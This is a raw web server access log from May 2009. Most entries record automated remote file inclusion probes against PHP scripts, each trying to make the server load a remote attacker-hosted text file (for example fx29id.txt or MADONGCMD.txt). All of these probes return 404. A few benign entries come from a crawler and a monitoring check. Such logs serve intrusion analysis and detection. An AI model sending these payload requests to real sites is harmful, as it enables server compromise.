69.73.188.28 - - [07/May/2009:23:36:30 -0400] "GET /logs/access_log.Q108062800///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.73.188.28 - - [07/May/2009:23:36:30 -0400] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
69.73.188.28 - - [07/May/2009:23:36:30 -0400] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
69.73.188.28 - - [07/May/2009:23:36:45 -0400] "GET /logs/access_log.Q108071200///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.165.73.157 - - [07/May/2009:23:38:20 -0400] "GET /index.php?meio.php=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.165.73.157 - - [07/May/2009:23:38:20 -0400] "GET /logs/access_log.Q109042500/index.php?meio.php=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.165.73.157 - - [07/May/2009:23:38:20 -0400] "GET /logs/index.php?meio.php=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
210.239.42.208 - - [07/May/2009:23:38:33 -0400] "GET ///components/com_simpleboard/image_upload.php?sbp=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/bh.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
72.30.142.94 - - [07/May/2009:23:39:14 -0400] "GET /logs/access_log.Q108031300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [07/May/2009:23:40:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.89.31.105 - - [07/May/2009:23:41:16 -0400] "GET /logs/access_log.Q109012900//skin/zero_vote/error.php?dir=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.812"
121.165.73.157 - - [07/May/2009:23:41:55 -0400] "GET /errors.php?error=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.165.73.157 - - [07/May/2009:23:41:55 -0400] "GET /logs/errors.php?error=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.165.73.157 - - [07/May/2009:23:41:55 -0400] "GET /logs/access_log.Q108100500/errors.php?error=http://hicham.waray.free.fr/eva/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
